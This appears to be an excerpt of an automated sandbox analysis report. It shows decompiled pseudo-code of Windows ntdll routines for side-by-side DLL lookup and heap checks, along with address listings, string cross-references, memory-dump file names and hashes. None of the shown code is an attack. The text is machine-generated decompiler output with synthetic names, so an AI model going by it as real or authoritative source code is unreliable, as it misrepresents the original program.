							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E009578E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E009578E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E00938980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E009AC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E009578E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
													E00938980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = L0092FBD7(1,  &_v68, 0x95b024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E009B77A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E009578E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E00938980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E009578E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E00938980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
						L00973F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E0094C507(_t303, _v124, _v120,  &_v60, 0x94cdad,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}















































































                                                                                                                                                    0x0092f3cf
                                                                                                                                                    0x0092f3da
                                                                                                                                                    0x0092f3e1
                                                                                                                                                    0x0092f3eb
                                                                                                                                                    0x0092f3f4
                                                                                                                                                    0x0092f3f9
                                                                                                                                                    0x0092f3fb
                                                                                                                                                    0x0092f3fe
                                                                                                                                                    0x0092f408
                                                                                                                                                    0x0092f40f
                                                                                                                                                    0x0092f412
                                                                                                                                                    0x0092f41a
                                                                                                                                                    0x0092f41d
                                                                                                                                                    0x0092f420
                                                                                                                                                    0x0092f423
                                                                                                                                                    0x0092f42b
                                                                                                                                                    0x0092f42e
                                                                                                                                                    0x0092f42f
                                                                                                                                                    0x0092f433
                                                                                                                                                    0x0092f439
                                                                                                                                                    0x0092f444
                                                                                                                                                    0x0092f44e
                                                                                                                                                    0x0092f451
                                                                                                                                                    0x0092f454
                                                                                                                                                    0x0092f457
                                                                                                                                                    0x0092f45f
                                                                                                                                                    0x0092f463
                                                                                                                                                    0x0094c2bb
                                                                                                                                                    0x0094c2bf
                                                                                                                                                    0x0094c4fb
                                                                                                                                                    0x0094c4fb
                                                                                                                                                    0x0092f475
                                                                                                                                                    0x0092f475
                                                                                                                                                    0x0092f478
                                                                                                                                                    0x0092f47d
                                                                                                                                                    0x0092f481
                                                                                                                                                    0x00983bf8
                                                                                                                                                    0x00983bfb
                                                                                                                                                    0x00983c00
                                                                                                                                                    0x00983c00
                                                                                                                                                    0x0092f48a
                                                                                                                                                    0x0092f48d
                                                                                                                                                    0x0092f48d
                                                                                                                                                    0x0092f490
                                                                                                                                                    0x0092f495
                                                                                                                                                    0x0092f499
                                                                                                                                                    0x0092f499
                                                                                                                                                    0x0092f4a2
                                                                                                                                                    0x0092f4a6
                                                                                                                                                    0x0092f4aa
                                                                                                                                                    0x0092f4ae
                                                                                                                                                    0x0093e238
                                                                                                                                                    0x0093e238
                                                                                                                                                    0x0092f4c3
                                                                                                                                                    0x0092f4c3
                                                                                                                                                    0x0094c2c5
                                                                                                                                                    0x0094c2cf
                                                                                                                                                    0x0094c2d2
                                                                                                                                                    0x00964327
                                                                                                                                                    0x00964327
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00964327
                                                                                                                                                    0x0094c2d8
                                                                                                                                                    0x0094c2df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c2e5
                                                                                                                                                    0x0094c2eb
                                                                                                                                                    0x0094c2ee
                                                                                                                                                    0x0094c2f1
                                                                                                                                                    0x0094c2f3
                                                                                                                                                    0x0094c2f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c2fc
                                                                                                                                                    0x0094c2ff
                                                                                                                                                    0x0094c302
                                                                                                                                                    0x0094c304
                                                                                                                                                    0x0094c30a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c310
                                                                                                                                                    0x0094c318
                                                                                                                                                    0x0094c31a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c320
                                                                                                                                                    0x0094c322
                                                                                                                                                    0x0094c325
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c32b
                                                                                                                                                    0x0094c32e
                                                                                                                                                    0x0094c331
                                                                                                                                                    0x0094c333
                                                                                                                                                    0x0094c335
                                                                                                                                                    0x0094c37b
                                                                                                                                                    0x0094c383
                                                                                                                                                    0x0094c386
                                                                                                                                                    0x0094c388
                                                                                                                                                    0x0094c38a
                                                                                                                                                    0x0094c38c
                                                                                                                                                    0x0094c38f
                                                                                                                                                    0x0094c391
                                                                                                                                                    0x0094c391
                                                                                                                                                    0x0094c394
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c35
                                                                                                                                                    0x00983c39
                                                                                                                                                    0x00983c3b
                                                                                                                                                    0x00983c3e
                                                                                                                                                    0x00983c41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c4a
                                                                                                                                                    0x00983c4d
                                                                                                                                                    0x00983c4f
                                                                                                                                                    0x00983c51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c5c
                                                                                                                                                    0x00983c5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c68
                                                                                                                                                    0x00983c6d
                                                                                                                                                    0x00983c6e
                                                                                                                                                    0x00983c6e
                                                                                                                                                    0x0094c39a
                                                                                                                                                    0x0094c39d
                                                                                                                                                    0x0094c39f
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a9
                                                                                                                                                    0x0094c3ac
                                                                                                                                                    0x0094c3b1
                                                                                                                                                    0x00983dae
                                                                                                                                                    0x00983dae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c3b7
                                                                                                                                                    0x0094c3b7
                                                                                                                                                    0x0094c3ba
                                                                                                                                                    0x0094c3bc
                                                                                                                                                    0x00983c76
                                                                                                                                                    0x00983c7a
                                                                                                                                                    0x00983c7f
                                                                                                                                                    0x00983c81
                                                                                                                                                    0x00983c8d
                                                                                                                                                    0x0094c3cb
                                                                                                                                                    0x0094c3cd
                                                                                                                                                    0x0094c3d4
                                                                                                                                                    0x0094c3d8
                                                                                                                                                    0x0094c3da
                                                                                                                                                    0x0094c445
                                                                                                                                                    0x0094c445
                                                                                                                                                    0x0094c449
                                                                                                                                                    0x0094c44d
                                                                                                                                                    0x00983caa
                                                                                                                                                    0x00983cad
                                                                                                                                                    0x00983cb0
                                                                                                                                                    0x00983cb8
                                                                                                                                                    0x00983cbe
                                                                                                                                                    0x00983cc5
                                                                                                                                                    0x00983cc9
                                                                                                                                                    0x00983cce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cd7
                                                                                                                                                    0x00983cd9
                                                                                                                                                    0x00983ce0
                                                                                                                                                    0x00983ce7
                                                                                                                                                    0x00983cec
                                                                                                                                                    0x00983cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cf0
                                                                                                                                                    0x00983cfd
                                                                                                                                                    0x00983d05
                                                                                                                                                    0x00983d0d
                                                                                                                                                    0x00983d11
                                                                                                                                                    0x00983d20
                                                                                                                                                    0x00983d24
                                                                                                                                                    0x00983d27
                                                                                                                                                    0x00983d29
                                                                                                                                                    0x00983d2c
                                                                                                                                                    0x00983d2f
                                                                                                                                                    0x00983d36
                                                                                                                                                    0x00983d39
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983d3f
                                                                                                                                                    0x00983cdb
                                                                                                                                                    0x00983cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983caa
                                                                                                                                                    0x0094c453
                                                                                                                                                    0x0094c456
                                                                                                                                                    0x0094c458
                                                                                                                                                    0x0094c45b
                                                                                                                                                    0x0094c45d
                                                                                                                                                    0x0094c4e4
                                                                                                                                                    0x0094c4e7
                                                                                                                                                    0x0094c4ea
                                                                                                                                                    0x00983dce
                                                                                                                                                    0x00983dd3
                                                                                                                                                    0x00983dda
                                                                                                                                                    0x00983ddc
                                                                                                                                                    0x00983dde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983de6
                                                                                                                                                    0x00983ded
                                                                                                                                                    0x00983df0
                                                                                                                                                    0x00983df5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983df7
                                                                                                                                                    0x00983dfa
                                                                                                                                                    0x00983dfc
                                                                                                                                                    0x00983e03
                                                                                                                                                    0x00983e07
                                                                                                                                                    0x00983e0c
                                                                                                                                                    0x00983e0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e14
                                                                                                                                                    0x00983e23
                                                                                                                                                    0x00983e2a
                                                                                                                                                    0x00983e32
                                                                                                                                                    0x00983e36
                                                                                                                                                    0x00983e43
                                                                                                                                                    0x00983e4f
                                                                                                                                                    0x00983e51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e51
                                                                                                                                                    0x00983dfe
                                                                                                                                                    0x00983e01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e01
                                                                                                                                                    0x0094c4f0
                                                                                                                                                    0x0094c4f0
                                                                                                                                                    0x0094c4f3
                                                                                                                                                    0x0094c4f5
                                                                                                                                                    0x00983e5a
                                                                                                                                                    0x00983e5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c4f5
                                                                                                                                                    0x0094c463
                                                                                                                                                    0x0094c465
                                                                                                                                                    0x00983d58
                                                                                                                                                    0x00983d5a
                                                                                                                                                    0x00983d5c
                                                                                                                                                    0x00983d98
                                                                                                                                                    0x00983da6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983da6
                                                                                                                                                    0x00983d5e
                                                                                                                                                    0x00983d64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983d6a
                                                                                                                                                    0x00983d6f
                                                                                                                                                    0x00983d74
                                                                                                                                                    0x00983d74
                                                                                                                                                    0x00983d79
                                                                                                                                                    0x00983d7e
                                                                                                                                                    0x00983d83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983d83
                                                                                                                                                    0x0094c46b
                                                                                                                                                    0x0094c46b
                                                                                                                                                    0x0094c46f
                                                                                                                                                    0x0094c471
                                                                                                                                                    0x0094c477
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c480
                                                                                                                                                    0x0094c484
                                                                                                                                                    0x0094c489
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c48f
                                                                                                                                                    0x0094c492
                                                                                                                                                    0x0094c494
                                                                                                                                                    0x00983db8
                                                                                                                                                    0x00983dbc
                                                                                                                                                    0x00983dc1
                                                                                                                                                    0x00983dc3
                                                                                                                                                    0x0094c4a3
                                                                                                                                                    0x0094c4b2
                                                                                                                                                    0x0094c4b9
                                                                                                                                                    0x0094c4c1
                                                                                                                                                    0x0094c4c5
                                                                                                                                                    0x0094c4d2
                                                                                                                                                    0x0094c4db
                                                                                                                                                    0x0094c4de
                                                                                                                                                    0x0094c4de
                                                                                                                                                    0x0094c4e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c4e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983dc9
                                                                                                                                                    0x0094c49a
                                                                                                                                                    0x0094c49d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c49d
                                                                                                                                                    0x0094c3de
                                                                                                                                                    0x0094c3e4
                                                                                                                                                    0x0094c3e7
                                                                                                                                                    0x0094c3ec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c3f2
                                                                                                                                                    0x0094c3f4
                                                                                                                                                    0x00983c95
                                                                                                                                                    0x00983c99
                                                                                                                                                    0x00983c9e
                                                                                                                                                    0x00983ca0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983ca2
                                                                                                                                                    0x0094c403
                                                                                                                                                    0x0094c405
                                                                                                                                                    0x0094c418
                                                                                                                                                    0x0094c420
                                                                                                                                                    0x0094c426
                                                                                                                                                    0x0094c42d
                                                                                                                                                    0x0094c434
                                                                                                                                                    0x0094c43a
                                                                                                                                                    0x0094c43f
                                                                                                                                                    0x0094c43f
                                                                                                                                                    0x0094c441
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c441
                                                                                                                                                    0x0094c3fa
                                                                                                                                                    0x0094c3fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c3fd
                                                                                                                                                    0x00983c83
                                                                                                                                                    0x00983c83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c83
                                                                                                                                                    0x0094c3c2
                                                                                                                                                    0x0094c3c5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c3c5
                                                                                                                                                    0x0094c3b1
                                                                                                                                                    0x0094c337
                                                                                                                                                    0x0094c339
                                                                                                                                                    0x0094c33c
                                                                                                                                                    0x0094c33e
                                                                                                                                                    0x00983bce
                                                                                                                                                    0x00983bd3
                                                                                                                                                    0x00983be7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983bec
                                                                                                                                                    0x0094c344
                                                                                                                                                    0x0094c348
                                                                                                                                                    0x0095c1a5
                                                                                                                                                    0x0095c1a9
                                                                                                                                                    0x00983c08
                                                                                                                                                    0x00983c0d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c0d
                                                                                                                                                    0x0095c1b1
                                                                                                                                                    0x0095c1b1
                                                                                                                                                    0x0094c34e
                                                                                                                                                    0x0094c352
                                                                                                                                                    0x0096431f
                                                                                                                                                    0x0096431f
                                                                                                                                                    0x0094c371
                                                                                                                                                    0x0094c373
                                                                                                                                                    0x0094c375
                                                                                                                                                    0x00983c17
                                                                                                                                                    0x00983c1d
                                                                                                                                                    0x00983c23
                                                                                                                                                    0x00983c27
                                                                                                                                                    0x00983c2d
                                                                                                                                                    0x00983c2d
                                                                                                                                                    0x00983c27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c375
                                                                                                                                                    0x0092f46f
                                                                                                                                                    0x00983bc0
                                                                                                                                                    0x00983bc0
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00983BDF
                                                                                                                                                    • @, xrefs: 0092F3FE
                                                                                                                                                    • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00983D74
                                                                                                                                                    • Internal error check failed, xrefs: 00983D79
                                                                                                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 00983BCE
                                                                                                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00983C08
                                                                                                                                                    • Status != STATUS_NOT_FOUND, xrefs: 00983D6A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                    • API String ID: 0-4103935307
                                                                                                                                                    • Opcode ID: 1cdcd270c878460d6a08f1331f9b5449190e508a7837271c4389daf618d6d2b7
                                                                                                                                                    • Instruction ID: ab15dbd53f79c82b2e52631e5a81851df91552bb00e20355637fc87974600210
                                                                                                                                                    • Opcode Fuzzy Hash: 1cdcd270c878460d6a08f1331f9b5449190e508a7837271c4389daf618d6d2b7
                                                                                                                                                    • Instruction Fuzzy Hash: C4029B70A00219DFDB24DFA9C991ABEB7F4FF48704F20842DE986AB291E7749945CB10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00937353, Relevance: 5.5, Strings: 4, Instructions: 466COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 0097DABE
                                                                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 0097DBA6
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0097DAA6, 0097DB8E
                                                                                                                                                    • HEAP: , xrefs: 0097DAB3, 0097DB9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                    • API String ID: 0-1657114761
                                                                                                                                                    • Opcode ID: 3ec3452b22480b9639a0ce85fabbe5f12dc4206a65be7abbfc6438980bd80f25
                                                                                                                                                    • Instruction ID: 50d39725d66f6c93a1a17f16060f6359356c16645f911cca0438c3e17c87335b
                                                                                                                                                    • Opcode Fuzzy Hash: 3ec3452b22480b9639a0ce85fabbe5f12dc4206a65be7abbfc6438980bd80f25
                                                                                                                                                    • Instruction Fuzzy Hash: FB02A9B1608646CFDB28CF98C494B7AB7F5FF44304F298569E8868B291D734E941DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0093351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0098A4AC
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098A48B
                                                                                                                                                    • HEAP: , xrefs: 0098A498
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: b41eb7ea4943d553730976b56f2698ca0c3f9c7ca2ebd102b0a478e8467fdade
                                                                                                                                                    • Instruction ID: ef83fb46c9b0fe8451fadc79e37b5b6e61062608343a9631d7f6434b91670012
                                                                                                                                                    • Opcode Fuzzy Hash: b41eb7ea4943d553730976b56f2698ca0c3f9c7ca2ebd102b0a478e8467fdade
                                                                                                                                                    • Instruction Fuzzy Hash: 1DC2AAB1A00212CFDB18CF19C490A7A77A6FF94311F29C5AAEC5A8B355E734ED41DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

